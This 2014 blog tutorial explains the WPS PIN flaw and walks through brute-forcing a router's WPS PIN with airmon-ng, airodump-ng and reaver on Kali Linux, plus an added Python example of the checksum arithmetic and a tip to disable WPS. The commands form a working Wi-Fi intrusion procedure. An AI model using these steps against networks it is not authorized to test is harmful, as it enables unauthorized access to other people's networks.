Monday, 17 November 2014

Hacking a WPS-enabled router

Yes! It is very easy to hack a wireless network, even the highly secured ones. All it takes is a person who knows what he is doing and a few tools in his hands. We can't protect ourselves much if we don't know how easy it is to break in. We are going to use Kali Linux (the successor of the famous pen-testing distribution BackTrack) for the purpose.

Often we enable the WPS PIN on our routers for the sake of easy connectivity. But a certain loophole in the WPS system lets anyone hack into the network very easily using a brute-force method. Generally it takes 3 to 4 hours if we are close to the router and have a good network card installed in our system.

The WPS PIN is 8 digits long: the first 7 digits are the actual PIN, and the 8th digit is a checksum of them.
The loophole in this system lets a user learn whether the first half of the PIN is a correct match, so that half can be found in merely 10000 comparisons, while the next 3 digits can be brute-forced in 1000 comparisons. Thus, in a total of 11000 comparisons, we can easily get into the network.
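To make the arithmetic above concrete, here is an added example (not part of the original post) that implements the WPS PIN checksum rule from the WPS specification and compares the worst-case number of attempts with and without the split verification flaw; the function names are my own.

```python
# Added example: the WPS PIN checksum digit and the effect of the
# split-verification flaw on the size of the PIN search space.
# The checksum rule is the one from the WPS specification; everything
# else (function names, sample PINs) is constructed for this example.


def wps_checksum_digit(first7: str) -> int:
    """Return the 8th (checksum) digit for the first 7 PIN digits.

    Digits at positions 1, 3, 5 and 7 are weighted 3, the others 1;
    the checksum digit brings the weighted sum up to a multiple of 10.
    """
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("expected exactly 7 decimal digits")
    total = 0
    for index, char in enumerate(first7):
        weight = 3 if index % 2 == 0 else 1
        total += weight * int(char)
    return (10 - total % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN has a correct checksum digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum_digit(pin[:7]) == int(pin[7])


def worst_case_attempts(split_verification: bool) -> int:
    """Attempts needed to exhaust the PIN space.

    If the registrar only accepts or rejects the whole PIN, all 10**7
    checksum-valid PINs may have to be tried. If it reveals whether the
    first half matched (the WPS flaw), the halves can be searched
    separately: 10**4 for the first four digits, then 10**3 for the next
    three, with the 8th digit fixed by the checksum.
    """
    if split_verification:
        return 10**4 + 10**3
    return 10**7


if __name__ == "__main__":
    # "12345670" is the checksum-completed form of the digits 1234567.
    print(wps_checksum_digit("1234567"), is_valid_wps_pin("12345670"))
    print(worst_case_attempts(False), "vs", worst_case_attempts(True))
```

The 11000 figure is why the practical advice for defenders is simply to turn WPS off on the router.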

How to test (hack) the network:

First of all, I am assuming that you are doing this on your own network, as hacking into anyone else's system is against the law.  

All we need is a system running Kali Linux or BackTrack, either live or installed on the hard disk. Actually any Linux system will do the job, but Kali Linux has all the tools pre-installed.
(We don't have to spoof our MAC address, as we are hacking our own network.)
1. Boot into the system as root.
2. Open up the terminal.
3. Disconnect from any known Wi-Fi network.
4. Type "ifconfig" (without the quotes). It will display the adaptors your system has. Note down the one that looks like "wlanX"; mine shows wlan0.
5. Type "airmon-ng start wlanX", replacing X with whatever showed up on your system.
6. Monitor mode must now be enabled on a new interface, something of the form "mon0" or "mon1" (newer versions of aircrack-ng name it "wlanXmon" instead). Note it down; mine showed mon0.
7. Type "airodump-ng mon0" (or mon1, or whatever it was in your case).
8. The screen now shows all the networks in your area.
9. Hit Ctrl+C when you see your network.
10. Copy the MAC address of your network (it should be shown in the leftmost column).
11. Type "reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv", where xx:xx:xx:xx:xx:xx is replaced by the MAC of your router that you copied in the previous step.
12. Now sit back and watch reaver do its job.

It should return the password of your Wi-Fi in 3-4 hours. It can take longer, depending on the distance to the router.

Here I have assumed you know the basics of Linux and some networking concepts. Ask in the comments if there is anything unclear.
